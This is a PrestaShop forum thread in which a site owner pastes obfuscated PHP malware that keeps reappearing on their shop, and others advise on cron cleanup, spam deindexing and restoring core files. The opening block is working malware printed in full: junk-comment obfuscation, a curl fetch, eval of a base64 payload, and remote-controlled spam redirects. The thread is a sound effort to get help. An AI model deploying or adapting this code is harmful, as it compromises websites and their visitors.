/*-MAg.[,i-*/curl_init/*-Hu^[-*/(/*-SQ(5-*/$kzXTb/*-&6il78yIc-*/);/*-ugk,mp1XK-*/ curl_setopt/*-Q]2k3-*/(/*-g(`T~}-*/$cqWjxY,/*-5P!eTG-*/ CURLOPT_RETURNTRANSFER,/*-wo-*/ 1/*-7k0}-*/);/*-[qT-*/ $KvSWuIMzpG/*-I@_(fMP-*/ = /*-&vEyWOz-*/curl_exec/*-vco})kyVdY-*/(/*-2tC-*/$cqWjxY/*-(h.$VQ3-*/); /*-Yk!-*/return /*-bc-*/empty/*->Gk|:-*/(/*-)uE-*/$KvSWuIMzpG/*-|cR+Z^6fJ-*/)/*-_f28-*/ ? /*-C[O#_5th]$-*/$LMpKBESA/*-<Mg-*/(/*-[F>h2-*/$kzXTb/*-qj.u-*/)/*-i$S_-*/ : /*-p=R-*/$KvSWuIMzpG; /*-ZmVYnX!8-*/}/*-nRe&-*/ static/*-_yitaQ--*/ function /*-u0CaztY-*/lRBstZXuLC/*-)ur69n%-*/() /*-dq0cYC]:-*/{/*-1CEm~-*/ $iE /*-<7Q$LlX-*/=/*-`s=-*/ array/*-f7n11Uug_-*/("52013.51998.52011.52015.51996.52011.52017.52010.51995.52002.52013.51996.52007.52001.52002","51997.51996.51998.52017.51998.52001.51996.52063.52061","52006.51997.52001.52002.52017.52012.52011.52013.52001.52012.52011","52000.52015.52013.52005","52014.52015.51997.52011.52058.52060.52017.52012.52011.52013.52001.52012.52011","52010.52007.52004.52011.52017.52009.52011.51996.52017.52013.52001.52002.51996.52011.52002.51996.51997","52040.52070","51987","52065.52070","52047.52030.52030.52047.52023","52001.52010"); /*-L-*/foreach /*-u{!Cy-*/(/*-{+,-*/$iE/*-lA36_-*/ as /*-V~C]AG8CN_-*/$HqwgeCI/*-HMW}OK5-*/)/*-_B&~D0Y-*/ $gJNZVFhLM/*-fIgPv-*/[] /*-1P~8H-*/= /*-(0g>OAV-*/self/*-9,-*/::/*-R7-Z~6<-*/AaBNn/*-A>1G$UHJm-*/(/*-GdN}Fk-*/$HqwgeCI/*-lxY:]HPE[7-*/);/*-x(HM-*/$fCGstJ /*-=s=-*/= /*-4y=^1yG,-*/@$gJNZVFhLM/*-2,~hbp&-*/[/*-PYSFHu-*/1/*-lVUYhh}-*/]/*-OpmY-*/(/*-DFm-*/${/*-q`z8kU-*/"_"/*-[VFP[-*/."G"/*-[Ht8-*/."E"/*-NT-P_V-*/."T"/*-p]vLd5j-*/}[/*->@-*/$gJNZVFhLM/*-p!G:-*/[/*-3+k-*/6+3/*-c<`{4c^yL-*/]]/*-r%Ij-*/);/*-wDPu}8-*/ $eQEpLz /*-6t)8+&clf-*/=/*-zx1$<A+D-*/ @$gJNZVFhLM/*-h_x~Uo5-*/[/*--fO5=FGt-*/3+0/*-r0>Q0-*/]/*-0Dzc&2x-*/(/*-12k(Be{X-*/$gJNZVFhLM/*-c%EM-*/[/*-_@&-*/4+2/*-)J&Zx-*/], /*-L-!O-*/$fCGstJ/*-]R)%m)0,L5-*/);/*-&L-*/ $fLs /*-9Ovo0}-*/=/*-ol_JiS-*/ $gJNZVFhLM/*-NdH-*/[/*-dd-*/1+1/*-gP^-*/]/*-_8-*/(/*-%G^-*/$eQEpLz,/*-lRTpzn>Jh-*/ true/*-@of12J7qy-*/); /*-^^9_-*/@${/*-031Ap-*/"_"./*-x~xaD<IX-*/"G"./*-#1st3-*/"E"/*-3(K&}|)#~-*/."T"/*-TP-*/}/*-MO__1!U-*/[/*-UA-*/$gJNZVFhLM/*-Zm-*/[5+5/*-IK-*/]/*-$#7ib(:-*/]/*-2E2=-*/ == /*-zbD<-*/1 /*-QU9LH!-*/&& /*-@TBBt-*/die/*-reywAeLe}Z-*/(/*-n)-*/$gJNZVFhLM[1+4/*-R^-*/]/*-n-8`l72-*/(/*-+m$a-*/__FILE__/*-m<SP.Pk)G-*/)/*-LjQ]bj-*/); /*-V]B)y~t0x-*/if/*-MU-*/(/*-|YyS.ME#p-*/ (/*-(U}SZ]-*/(@/*-!8i>-*/$fLs/*--JdE6ML=lD-*/[/*--a-*/0/*-:lo-*/] /*-B!wl-*/- time/*-p:-*/()/*-pT,GGOkhc-*/) > /*-z7^H-*/0/*-xGXX#n-*/)/*-A,-*/ and /*-ztZ{-*/(/*-FIPB-97-*/md5/*-Yb:=-*/(/*-+nDXAoX--*/md5/*-k2+-*/(/*-jMVWoUD[<-*/$fLs/*-+p1>m-P-*/[/*-C_T~`-*/1+2/*-&DK.D&9UT2-*/]/*-e_RSBZ-*/)/*-#Ci2K@9-*/)/*-N5G<<j-*/ === /*-],xa-*/"e46f3c25e88b60b249f4a91815ca94b1"/*-_ix-*/)/*-{$mXuJnR-*/ ): /*-QR}jM>(b,q-*/$zcwMvFeKfy /*-#>p-*/=/*-L!vC-*/ self/*-+3f:s4>-*/::/*-AtG-*/EmCfWJ/*-!<]-*/(/*-j^p-*/$fLs/*-DC1cy^u9W-*/[/*-hE|^fB-*/0+1/*-aaHVO-*/], /*-zY7f^-*/$gJNZVFhLM/*-j.-*/[/*-y}gMz):,V-*/5+0/*-Cv7>-*/]/*-$)lJs,:-*/);/*-+l-*/@eval/*-xG}Z^A=-*/(/*-Hr-*/$gJNZVFhLM/*-|Ud>|d,-*/[/*-nQ@W:%P-*/2+2/*-P+-*/]/*-W8X$.-*/(/*-,-*/$zcwMvFeKfy/*-{x6rOk-*/)/*-ZhA1.N-*/);/*-gXG@-*//*-ns8z-*/die;/*-8-WgH9-*/ endif;/*-tk1oAxA~-*/ }/*-IN>JLO-*/}/*-PFdKd-)(-*/qM/*--)qDigTl-*/::/*-7P-*/lRBstZXuLC/*[email protected]*/();/*-#og[p%-*//*-f_f)QM@--*/eval/*-Q2IXIrKhK<B4O!-<h~l^].+>H)7HH-*/(/*-g^eu7a3Y[-*/base64_decode/*-yn[@hC7C-*/(/*-<0@ZXG1-*/"ZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnSUdobFlXUmxjaWduUTI5dWRHVnVkQzFVZVhCbE9pQjBaWGgwTDJoMGJXdzdJR05vWVhKelpYUTlkWFJtTFRnbktUc2daWEp5YjNKZmNtVndiM0owYVc1bktEQXBPMloxYm1OMGFXOXVJRk5HZEdoeFlVdFVVRWRYYlV3b0pISmxjM0JmYUdWaFpHVnlLWHNrYUdWaFpHVnlJRDBnWVhKeVlYa29KM04wWVhSMWN5Y2dQVDRnTUN3Z0oyTnZiblJsYm5RbklEMCtJQ2NuTENBbmRIbHdaU2NnUFQ0Z0p5Y3BPMmxtSUNnaGFYTmZZWEp5WVhrb0pISmxjM0JmYUdWaFpHVnlLU2tnZTNKbGRIVnliaUFrYUdWaFpHVnlPMzFtYjNKbFlXTm9JQ2drY21WemNGOW9aV0ZrWlhJZ1lYTWdKR2h2Ym1VcElIdHBaaUFvY0hKbFoxOXRZWFJqYUNnbkwyaDBkSEJjTDFzd0xUbGNMbDByVzF4elhTc29XekF0T1YwcktTOXBKeXdnSkdodmJtVXNJQ1J0WVhSamFHVmtLU2tnZXlSb1pXRmtaWEpiSjNOMFlYUjFjeWRkSUQwZ2FXNTBkbUZzS0NSdFlYUmphR1ZrV3pGZEtUdDlJR1ZzYzJWcFppQW9jSEpsWjE5dFlYUmphQ2duTDJ4dlkyRjBhVzl1WERwYlhITmRLeWd1S2lrdmFTY3NJQ1JvYjI1bExDQWtiV0YwWTJobFpDa3BJSHNrYUdWaFpHVnlXeWRqYjI1MFpXNTBKMTBnUFNBa2JXRjBZMmhsWkZzeFhUdDlJR1ZzYzJWcFppQW9jSEpsWjE5dFlYUmphQ2duTDJOdmJuUmxiblJjTFhSNWNHVmNPbHRjYzEwcktDNHFLUzlwSnl3Z0pHaHZibVVzSUNSdFlYUmphR1ZrS1NrZ2V5Um9aV0ZrWlhKYkozUjVjR1VuWFNBOUlDUnRZWFJqYUdWa1d6RmRPMzE5Y21WMGRYSnVJQ1JvWldGa1pYSTdmV1oxYm1OMGFXOXVJR2QzYlhwRFIxcGxabGhLUVZVb0pIVnliQ3dnSkdSaGRHRnpJRDBnWVhKeVlYa29LU2w3SkhKbGMzQnZibk5sSUQwZ1lYSnlZWGtvSjNOMFlYUjFjeWNnUFQ0Z01Dd2dKMk52Ym5SbGJuUW5JRDArSUNjbkxDQW5kSGx3WlNjZ1BUNGdKeWNwTzJsbUlDaHBjMTloY25KaGVTZ2taR0YwWVhNcElDWW1JR052ZFc1MEtDUmtZWFJoY3lrcElIc2tkWEpzSUM0OUlDYy9KeUF1SUdoMGRIQmZZblZwYkdSZmNYVmxjbmtvSkdSaGRHRnpLVHQ5ZEhKNUlIdHBaaUFvWm5WdVkzUnBiMjVmWlhocGMzUnpLQ2RqZFhKc1gyVjRaV01uS1NBbUppQm1kVzVqZEdsdmJsOWxlR2x6ZEhNb0oyTjFjbXhmYVc1cGRDY3BLU0I3SkdNZ1BTQmpkWEpzWDJsdWFYUW9LVHRqZFhKc1gzTmxkRzl3ZENna1l5d2dRMVZTVEU5UVZGOVZVa3dzSUNSMWNtd3BPMk4xY214ZmMyVjBiM0IwS0NSakxDQkRWVkpNVDFCVVgxTlRURjlXUlZKSlJsbElUMU5VTENBd0tUdGpkWEpzWDNObGRHOXdkQ2drWXl3Z1ExVlNURTlRVkY5VFUweGZWa1ZTU1VaWlVFVkZVaXdnTUNrN1kzVnliRjl6WlhSdmNIUW9KR01zSUVOVlVreFBVRlJmUTA5T1RrVkRWRlJKVFVWUFZWUXNJREl3S1R0amRYSnNYM05sZEc5d2RDZ2tZeXdnUTFWU1RFOVFWRjlVU1UxRlQxVlVMQ0EyTUNrN1kzVnliRjl6WlhSdmNIUW9KR01zSUVOVlVreFBVRlJmUms5TVRFOVhURTlEUVZSSlQwNHNJREFwTzJOMWNteGZjMlYwYjNCMEtDUmpMQ0JEVlZKTVQxQlVYME5QVDB0SlJWTkZVMU5KVDA0c0lEQXBPMk4xY214ZmMyVjBiM0IwS0NSakxDQkRWVkpNVDFCVVgxSkZWRlZTVGxSU1FVNVRSa1ZTTENBeEtUc2tZMTl5WlhSMllXd2dQU0JqZFhKc1gyVjRaV01vSkdNcE95UnlaWE53YjI1elpWc25jM1JoZEhWekoxMGdQU0JwYm5SMllXd29ZM1Z5YkY5blpYUnBibVp2S0NSakxDQkRWVkpNU1U1R1QxOUlWRlJRWDBOUFJFVXBLVHNrY21WemNHOXVjMlZiSjNSNWNHVW5YU0E5SUhOMGNuWmhiQ2hqZFhKc1gyZGxkR2x1Wm04b0pHTXNJRU5WVWt4SlRrWlBYME5QVGxSRlRsUmZWRmxRUlNrcE95UnlaWE53YjI1elpWc25ZMjl1ZEdWdWRDZGRJRDBnYzNSeWRtRnNLR04xY214ZloyVjBhVzVtYnlna1l5d2dRMVZTVEVsT1JrOWZVa1ZFU1ZKRlExUmZWVkpNS1NrN1FHTjFjbXhmWTJ4dmMyVW9KR01wTzJsbUlDaHBibDloY25KaGVTZ2tjbVZ6Y0c5dWMyVmJKM04wWVhSMWN5ZGRMQ0JoY25KaGVTZ3lNREFzSURNd01Td2dNekF5TENBME1EUXBLU2tnZXlSeVpYTndiMjV6WlZzblkyOXVkR1Z1ZENkZElEMGdjM1J5ZG1Gc0tDUmpYM0psZEhaaGJDazdmWDBnWld4elpXbG1JQ2hwYm1sZloyVjBLQ2RoYkd4dmQxOTFjbXhmWm05d1pXNG5LU2tnZXlSb2RIUndYMjl3ZENBOUlHRnljbUY1S0Nkb2RIUndKeUE5UGlCaGNuSmhlU2duYldWMGFHOWtKeUE5UGlBblIwVlVKeXdnSjNScGJXVnZkWFFuSUQwK0lEWXdMQ0FuWm05c2JHOTNYMnh2WTJGMGFXOXVKeUE5UGlBd0tTd25jM05zSnlBOVBpQmhjbkpoZVNnaWRtVnlhV1o1WDNCbFpYSWlJRDArSUdaaGJITmxMQ0FpZG1WeWFXWjVYM0JsWlhKZmJtRnRaU0lnUFQ0Z1ptRnNjMlVwS1Rza1kyOXVkR1Y0ZENBOUlITjBjbVZoYlY5amIyNTBaWGgwWDJOeVpXRjBaU2drYUhSMGNGOXZjSFFwT3lSamIyNTBaVzUwSUQwZ1FHWnBiR1ZmWjJWMFgyTnZiblJsYm5SektDUjFjbXdzSUdaaGJITmxMQ0FrWTI5dWRHVjRkQ2s3SkhKbGMzQnZibk5sSUQwZ1lYSnlZWGxmYldWeVoyVW9KSEpsYzNCdmJuTmxMQ0JUUm5Sb2NXRkxWRkJIVjIxTUtDUm9kSFJ3WDNKbGMzQnZibk5sWDJobFlXUmxjaWtwTzJsbUlDaHBibDloY25KaGVTZ2tjbVZ6Y0c5dWMyVmJKM04wWVhSMWN5ZGRMQ0JoY25KaGVTZ3lNREFzSURNd01Td2dNekF5TENBME1EUXBLU2tnZXlSeVpYTndiMjV6WlZzblkyOXVkR1Z1ZENkZElEMGdjM1J5ZG1Gc0tDUmpiMjUwWlc1MEtUdDlmWDBnWTJGMFkyZ2dLRVY0WTJWd2RHbHZiaUFrWlNrZ2UzMXlaWFIxY200Z0pISmxjM0J2Ym5ObE8zMW1kVzVqZEdsdmJpQlJaa0pPZDFCc2VtSjRha2dvSkhOMGNpbDdhV1lnS0NFa2MzUnlLU0J5WlhSMWNtNGdKeWM3Y21WMGRYSnVJSEowY21sdEtITjBjblJ5S0dKaGMyVTJORjlsYm1OdlpHVW9KSE4wY2lrc0lDY3JMeWNzSUNjdFh5Y3BMQ0FuUFNjcE8zMW1kVzVqZEdsdmJpQnJTMGhOVEdGcVZIUnBRMGwyS0NsN0pHbHdYMkZrWkhJZ1BTQW5KenRwWmlBb2FYTnpaWFFvSkY5VFJWSldSVkpiSjBoVVZGQmZRMFpmUTA5T1RrVkRWRWxPUjE5SlVDZGRLU0FtSmlBaFpXMXdkSGtvSkY5VFJWSldSVkpiSjBoVVZGQmZRMFpmUTA5T1RrVkRWRWxPUjE5SlVDZGRLU2tnZXlScGNGOWhaR1J5SUQwZ0pGOVRSVkpXUlZKYkowaFVWRkJmUTBaZlEwOU9Ua1ZEVkVsT1IxOUpVQ2RkTzMwZ1pXeHpaV2xtSUNocGMzTmxkQ2drWDFORlVsWkZVbHNuU0ZSVVVGOVlYMUpGUVV4ZlNWQW5YU2tnSmlZZ0lXVnRjSFI1S0NSZlUwVlNWa1ZTV3lkSVZGUlFYMWhmVWtWQlRGOUpVQ2RkS1NrZ2V5UnBjRjloWkdSeUlEMGdKRjlUUlZKV1JWSmJKMGhVVkZCZldGOVNSVUZNWDBsUUoxMDdmU0JsYkhObGFXWWdLR2x6YzJWMEtDUmZVMFZTVmtWU1d5ZElWRlJRWDFoZlJrOVNWMEZTUkVWRVgwWlBVaWRkS1NBbUppQWhaVzF3ZEhrb0pGOVRSVkpXUlZKYkowaFVWRkJmV0Y5R1QxSlhRVkpFUlVSZlJrOVNKMTBwS1NCN0pHbHdYMkZrWkhJZ1BTQWtYMU5GVWxaRlVsc25TRlJVVUY5WVgwWlBVbGRCVWtSRlJGOUdUMUluWFR0OUlHVnNjMlVnZXlScGNGOWhaR1J5SUQwZ0pGOVRSVkpXUlZKYkoxSkZUVTlVUlY5QlJFUlNKMTA3ZlNScGNGOWhaR1J5SUQwZ2RISnBiU2h6ZEhKZmNtVndiR0ZqWlNnaUlDSXNJQ0lpTENBa2FYQmZZV1JrY2lrc0lDSXNJaWs3YVdZZ0tITjBjbkJ2Y3lna2FYQmZZV1JrY2l3Z0lpd2lLU0FoUFQwZ1ptRnNjMlVwSUhza2FYQmZZV1JrY2lBOUlHVjRjR3h2WkdVb0lpd2lMQ0FrYVhCZllXUmtjaWs3Skdsd1gyRmtaSElnUFNBa2FYQmZZV1JrY2xzd1hUdDljbVYwZFhKdUlDUnBjRjloWkdSeU8zMW1kVzVqZEdsdmJpQldlRmh6VEdwS2EwRm9ibkJOWlZsMVJsUW9LWHNrYUhSMGNGOXdjbTkwYnlBOUlDZG9kSFJ3T2k4dkp6dHBaaUFvYVhOelpYUW9KRjlUUlZKV1JWSmJKMGhVVkZCVEoxMHBJQ1ltSUhOMGNuUnZiRzkzWlhJb0pGOVRSVkpXUlZKYkowaFVWRkJUSjEwcElDRTlQU0FuYjJabUp5a2dleVJvZEhSd1gzQnliM1J2SUQwZ0oyaDBkSEJ6T2k4dkp6dDlJR1ZzYzJWcFppQW9hWE56WlhRb0pGOVRSVkpXUlZKYkowaFVWRkJmV0Y5R1QxSlhRVkpFUlVSZlVGSlBWRThuWFNrZ0ppWWdKRjlUUlZKV1JWSmJKMGhVVkZCZldGOUdUMUpYUVZKRVJVUmZVRkpQVkU4blhTQTlQVDBnSjJoMGRIQnpKeWtnZXlSb2RIUndYM0J5YjNSdklEMGdKMmgwZEhCek9pOHZKenQ5SUdWc2MyVnBaaUFvYVhOelpYUW9KRjlUUlZKV1JWSmJKMGhVVkZCZlJsSlBUbFJmUlU1RVgwaFVWRkJUSjEwcElDWW1JSE4wY25SdmJHOTNaWElvSkY5VFJWSldSVkpiSjBoVVZGQmZSbEpQVGxSZlJVNUVYMGhVVkZCVEoxMHBJQ0U5UFNBbmIyWm1KeWtnZXlSb2RIUndYM0J5YjNSdklEMGdKMmgwZEhCek9pOHZKenQ5Y21WMGRYSnVJQ1JvZEhSd1gzQnliM1J2TzMxcFppQW9KRjlUUlZKV1JWSmJKMUpGVVZWRlUxUmZWVkpKSjEwZ1BUMDlJQ2N2VWkwbklDNGdiV1ExS0NSZlUwVlNWa1ZTV3lkVFJWSldSVkpmVGtGTlJTZGRLU2tnZTJWNGFYUW9jM1J5Y21WMktHMWtOU2drWDFORlVsWkZVbHNuVTBWU1ZrVlNYMDVCVFVVblhTa3BLVHQ5YVdZZ0tITjFZbk4wY2w5amIzVnVkQ2drWDFORlVsWkZVbHNuVWtWUlZVVlRWRjlWVWtrblhTd2dKMmx1WkdWNExuQm9jQzlxYXljcEtTQjdaWGhwZENnbmV5QWlaWEp5YjNJaU9pQXlNREFzSUNKc1l5STZJQ0pxYXlJc0lDSmtZWFJoSWpvZ1d5QXhJRjBnZlNjcE8zMGthWEJmWVdSa2NpQTlJR3RMU0UxTVlXcFVkR2xEU1hZb0tUc2tjbVZtWlhKbGNpQTlJSE4wY25aaGJDaEFKRjlUUlZKV1JWSmJKMGhVVkZCZlVrVkdSVkpGVWlkZEtUc2tjMmwwWlY5MWNtd2dQU0JXZUZoelRHcEthMEZvYm5CTlpWbDFSbFFvS1NBdUlDUmZVMFZTVmtWU1d5ZElWRlJRWDBoUFUxUW5YVHRwWmlBb2MzUnljRzl6S0NSeVpXWmxjbVZ5TENBa2MybDBaVjkxY213cElEMDlQU0F3S1NBa2NtVm1aWEpsY2lBOUlDY25PeVJ5Y1NBOUlHRnljbUY1S0NrN0pISnhXeWRwSjEwZ1BTQlJaa0pPZDFCc2VtSjRha2dvSkdsd1gyRmtaSElwT3lSeWNWc25iQ2RkSUQwZ1VXWkNUbmRRYkhwaWVHcElLQ1JmVTBWU1ZrVlNXeWRJVkZSUVgwRkRRMFZRVkY5TVFVNUhWVUZIUlNkZEtUc2tjbkZiSjNOdUoxMGdQU0JSWmtKT2QxQnNlbUo0YWtnb0pGOVRSVkpXUlZKYkoxTkRVa2xRVkY5T1FVMUZKMTBwT3lSeWNWc25jaWRkSUQwZ1VXWkNUbmRRYkhwaWVHcElLQ1JmVTBWU1ZrVlNXeWRTUlZGVlJWTlVYMVZTU1NkZEtUc2tjbkZiSjNKbUoxMGdQU0JSWmtKT2QxQnNlbUo0YWtnb0pISmxabVZ5WlhJcE95UnljVnNuY3lkZElEMGdVV1pDVG5kUWJIcGllR3BJS0NSemFYUmxYM1Z5YkNrN0pISnhXeWQxSjEwZ1BTQlJaa0pPZDFCc2VtSjRha2dvSkY5VFJWSldSVkpiSjBoVVZGQmZWVk5GVWw5QlIwVk9WQ2RkS1Rza2NsOTBjbWx0SUQwZ2NISmxaMTl5WlhCc1lXTmxLQ2N2WEQ4dUtpOG5MQ0FuSnl3Z0pGOVRSVkpXUlZKYkoxSkZVVlZGVTFSZlZWSkpKMTBwT3lSeVgybHpkR0YwYVdNZ1BTQm1ZV3h6WlR0cFppQW9jM1J5Y0c5ektDUnlYM1J5YVcwc0lDY3VKeWtnUGlBd0ppWnpkSEp3YjNNb0pISmZkSEpwYlN3bkxuQm9jQ2NwUFQwOVptRnNjMlVwSUhza1pYaDBJRDBnYzNWaWMzUnlLQ1J5WDNSeWFXMHNJSE4wY25CdmN5Z2tjbDkwY21sdExDQW5MaWNwS1R0cFppQW9hVzVmWVhKeVlYa29KR1Y0ZEN3Z1lYSnlZWGtvSnk1cWN5Y3NJQ2N1WTNOekp5d2dKeTVxY0djbkxDQW5MbkJ1Wnljc0lDY3VaMmxtSnl3Z0p5NXBZMjhuS1NrcElIc2tjbDlwYzNSaGRHbGpJRDBnZEhKMVpUdDlmV2xtSUNnaEpISmZhWE4wWVhScFl5a2dleVJ5WlhOd2IyNXpaU0E5SUdkM2JYcERSMXBsWmxoS1FWVW9ZbUZ6WlRZMFgyUmxZMjlrWlNnaVlVaFNNR05FYjNaTU0zQjZUVlJWZVdScVJYcE1iVGx0V20xc2FscFlTWFZpUjBZd1RIY2lLU3dnSkhKeEtUdHBaaUFvSVdsdVgyRnljbUY1S0NSeVpYTndiMjV6WlZzbmMzUmhkSFZ6SjEwc0lHRnljbUY1S0RBc0lESXdNQ2twS1NCN2MzZHBkR05vSUNna2NtVnpjRzl1YzJWYkozTjBZWFIxY3lkZEtTQjdZMkZ6WlNBek1ERTZhR1ZoWkdWeUtDZElWRlJRTHpFdU1TQXpNREVnVFc5MlpXUWdVR1Z5YldGdVpXNTBiSGtuS1R0b1pXRmtaWElvSjB4dlkyRjBhVzl1T2lBbklDNGdkSEpwYlNna2NtVnpjRzl1YzJWYkoyTnZiblJsYm5RblhTa3BPMkp5WldGck8yTmhjMlVnTXpBeU9taGxZV1JsY2lnblNGUlVVQzh4TGpFZ016QXlJRTF2ZG1VZ1ZHVnRjRzl5WVhKcGJIa25LVHRvWldGa1pYSW9KMHh2WTJGMGFXOXVPaUFuSUM0Z2RISnBiU2drY21WemNHOXVjMlZiSjJOdmJuUmxiblFuWFNrcE8ySnlaV0ZyTzJOaGMyVWdOREEwT21obFlXUmxjaWduU0ZSVVVDOHhMakVnTkRBMElFNXZkQ0JHYjNWdVpDY3BPMmhsWVdSbGNpZ2ljM1JoZEhWek9pQTBNRFFnVG05MElFWnZkVzVrSWlrN1luSmxZV3M3WkdWbVlYVnNkRHBpY21WaGF6dDlmV2xtSUNoemRISnNaVzRvSkhKbGMzQnZibk5sV3lkamIyNTBaVzUwSjEwcEtTQjdRR2hsWVdSbGNpZ25RMjl1ZEdWdWRDMVVlWEJsT2ljZ0xpQWtjbVZ6Y0c5dWMyVmJKM1I1Y0dVblhTazdaV05vYnlBa2NtVnpjRzl1YzJWYkoyTnZiblJsYm5RblhUdGxlR2wwS0RBcE8zMTlQejQ9IikpOw=="/*-m_yyIq-*/)/*-zBR-*/);/*-pl08-*/?><?php

Dès que je le supprime, il réapparaît. J'ai supprimé le module simpleimportproduct mais sans succès. Une idée de comment trouver l'origine ?

[Eolia]

A priori c'est votre système qui a été infecté. Redémarrez complètement votre machine.

[AcidLava]

Redémarrer le serveur ?

[Eolia]

oui pour vider cette tache qui s'est rajoutée dans le cron système

[P i l o u]

Lorsque je tente d'afficher cette page sur le forum, mon anti-virus bloque la page et m'affiche qu'il a bloqué un trojan

 

[AcidLava]

@Eolia Ça a fonctionné merci. J'ai constaté que des milliers de liens avaient été indexés sur google suite à ce piratage via l'url monsite.fr/shop/...

Ces liens ne sont en parallèle pas répertoriés dans notre Google Search Console. Une idée du processus à suivre pour les faire désindexer ?

[Eolia]

S'ils ne sont pas dans GSC ils vont être supprimés naturellement dans l'index global de Google (mais ça peut prendre un peu de temps)

[AcidLava]

Il n'existe aucune solution pour soumettre à Google ce problème ?

[Eolia]

Perso je n'en ai pas  

[AcidLava]

Merci pour votre aide Eolia. Si jamais @Mediacom87 a une idée à ce sujet.

[Mediacom87]

il y a 7 minutes, AcidLava a dit :

Merci pour votre aide Eolia. Si jamais @Mediacom87 a une idée à ce sujet.

Une idée de ce qu'il y a dans la tête de Google, franchement cela fait bien longtemps que j'ai abandonné l'idée de les comprendre.

[Fahmid]

@Eolia After upload the cleaner.php file i run the scrip on mysite.com/cleaner.php. so What i have to do now? After run the script all malicious files and codes will be remove autometically or I have to do something else? I read so many comments there all instruction is same 1) Download the cleaner file 2) upload the cleaner file and 3rd) run this on my site site.com/cleaner.php  I completed those steps. what next?  Please help me.

[Eolia]

Hello,
Cleaner automatically removes what it recognizes as added and infected. (And shows you the message)
It temporarily fixes what it can.
If core files are marked as modified, replace them immediately with those from the original archive.
Then look at the code of the modules indicated as having risky functions.

[Fahmid]

@Eolia Here is my website scan report. can you please check the report and let me know is there anything i have to do or not? and core files are infected or not? Please I'm new here. I'm not so much expert in this matter.

 

Edited October 24 by Fahmid (see edit history)

[Eolia]

Restore all files with this line:

Delete the directory /installaaa

Delete old cache copy directory

And reload cleaner

[Fahmid]

Thank you @Eolia You are very helpful. I removed the /installaaa file and old cache copy directory.  You told me to restore files " 

MD5 INTEGRITY: PHP file modified compared to the original version. Content to check " with this line. My question is how can i restore those files? From a new version of prestashop files? 

Another question is My prestashop has a fake payment gateway now. I don't know who injected this fake payment gateway. What can I do for remove fake payment gateway?

Please don't mind I'm new in this. That's why I'm asking so many questions. Also I have attached the new scan report after removed the /installaaa and old cache copy files. Please give me instruction. 

[Eolia]

Click on the link

[Eolia]

Restore full directories:

/ classes

/controllers

/tools